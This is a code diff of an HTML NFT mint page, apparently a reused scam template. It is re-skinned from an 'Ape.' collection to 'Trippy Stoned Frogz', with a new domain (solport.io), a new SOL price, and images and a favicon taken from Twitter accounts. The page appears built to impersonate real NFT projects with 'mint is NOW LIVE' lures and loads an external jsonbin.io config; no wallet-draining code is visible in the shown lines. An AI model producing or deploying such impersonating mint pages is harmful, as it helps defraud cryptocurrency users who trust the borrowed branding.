--- a/index.html
+++ b/index.html
@@ -4,18 +4,17 @@
     <meta charset="utf-8">
     <meta name="description" content="NTC" data-react-helmet="true" />
     <meta name="theme-color" content="#000000" />
-    <meta content="🌐 justape.co/mint" property="og:title">
+    <meta content="🌐 solport.io/mint" property="og:title">
     <meta content="
-      🟢 Ape. Minting is NOW LIVE!
-    
-      Mint Price: 5 SOL
+       🟢Trippy Stoned Frogz Mint is NOW LIVE!
+       ◎ Price: 1.5 SOL
     " property="og:description">
-    <meta content="https://pbs.twimg.com/media/FTS9g3eWUAErHkx?format=jpg&name=4096x4096" property="og:image">
+    <meta content="https://pbs.twimg.com/profile_banners/1517533782148009984/1651582023/1500x500" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/143" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/147" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Ape.</title>
-    <link rel="shortcut icon" href="https://www.justape.co/favicon.ico" />
+    <title>Trippy Stoned Frogz</title>
+    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1518169348594098176/V-0B2jzP_400x400.jpg" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -54,12 +53,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">Ape.</h2>
+                <h2 class="right-title">Trippy Stoned Frogz</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            Just ape. A collection of 10,000 Apes that take us back to basics. None of the fluff, all of the value.
+                            2420 Addicted Frogz are coming to conquer the #Solana | $KIEF
                     </li>
                     </div>
 
@@ -70,7 +69,7 @@
                             <a href="javascript:void(0)" class="plus-btn">+</a>
                         </div>
                         <div class="price-box">
-                            <div id="price-total"><span>5</span> SOL</div>
+                            <div id="price-total"><span>1.5</span> SOL</div>
                             <div>2 NFT max per transaction</div>
                         </div>
                     </div>
@@ -91,7 +90,7 @@
                 </style>
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://www.justape.co/images/ape_example.png" alt="GiF">
+                        <img class="animation" src="https://pbs.twimg.com/media/FT8mQYNWIAQeCkk?format=jpg&name=large" alt="GiF">
                     </div>
                 </div>
             </div>
@@ -107,7 +106,7 @@
         const $numberText = document.querySelector("#total");
         const $remaining = document.querySelector('#remaining');
         const $priceResultText = document.querySelector("#price-total span");
-        let itemPriceSelected = 5;
+        let itemPriceSelected = 1.5;
         let itemCount = 1;
 
         $plusButton.addEventListener("click", function(e) {
